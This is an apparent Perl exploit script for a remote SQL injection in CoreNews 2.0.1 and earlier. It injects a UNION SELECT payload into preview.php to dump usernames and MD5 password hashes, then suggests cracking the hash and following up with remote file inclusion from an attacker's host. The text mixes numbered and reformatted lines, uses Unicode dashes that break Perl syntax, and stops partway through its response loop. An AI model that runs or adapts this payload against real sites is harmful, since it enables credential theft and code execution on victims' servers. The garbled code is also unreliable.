1 #!/usr/bin/perl
2 #Method found & Exploit scripted by nukedx
3 #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
4 #Original advisory: http://www.nukedx.com/?viewdoc=24
5 #Usage: corenews.pl <host> <path>
6 use IO::Socket;
# Entry point: the script expects exactly two command-line arguments
# (<host> and <path>). With two arguments it runs exploit(); with any
# other count it prints the usage text, which also exits.
if (@ARGV == 2) {
    exploit();
}
else {
    usage();
}
sub header()
{
    # Print the two-line advisory banner to STDOUT: the advisory number,
    # then the affected product/version range and the bug class.
    my @banner_lines = (
        "\n− NukedX Security Advisory Nr.2006−24\r\n",
        "− CoreNews <= 2.0.1 Remote SQL Injection Exploit\r\n",
    );
    for my $banner_line (@banner_lines) {
        print $banner_line;
    }
}
sub usage()
{
    # Print the banner followed by the command-line synopsis, then
    # terminate the script. Both arguments are positional: <host> is the
    # target host name and <path> is the CoreNews install path.
    header();
    my @help_lines = (
        "− Usage: $0 <host> <path>\r\n",
        "− <host> −> Victim’s host ex: www.victim.com\r\n",
        "− <path> −> Path to CoreNews ex: /corenews/\r\n",
    );
    for my $help_line (@help_lines) {
        print $help_line;
    }
    exit();
}
22 sub exploit ()
23 {
24 #Our variables...
25 $cnserver = $ARGV[0];
26 $cnserver =~ s/(http:\/\/)//eg;
27 $cnhost = "http://".$cnserver;
28 $cndir = $ARGV[1];
29 $cnport = "80";
30 $cntar = "preview.php?userid=";
31 $cnxp = "−1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*";
32 $cnreq = $cnhost.$cndir.$cntar.$cnxp;
33 #Sending data...
34 header();
35 print "− Trying to connect: $cnserver\r\n";
36 $cn = IO::Socket::INET−>new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "− Connection failed...\n";
37 print $cn "GET $cnreq HTTP/1.1\n";
38 print $cn "Accept: */*\n";
39 print $cn "Referer: $cnhost\n";
40 print $cn "Accept−Language: tr\n";
41 print $cn "User−Agent: NukeZilla\n";
42 print $cn "Cache−Control: no−cache\n";
43 print $cn "Host: $cnserver\n";
44 print $cn "Connection: close\n\n";
45 print "− Connected...\r\n";
46 while ($answer = <$cn>) {
47 if ($answer =~ /2022(.*?)20223([\d,a−f]{32})2203/) {
48 print "− Exploit succeed!\r\n";
49 print "− Username: $1\r\n";
50 print "− MD5 HASH of PASSWORD: $2\r\n";
51 print "− If you crack hash you can use RFI with example −>\r\n";
52 print "− Example: $cnhost$cndir?show=http://yourhost.com/file.txt\r\n";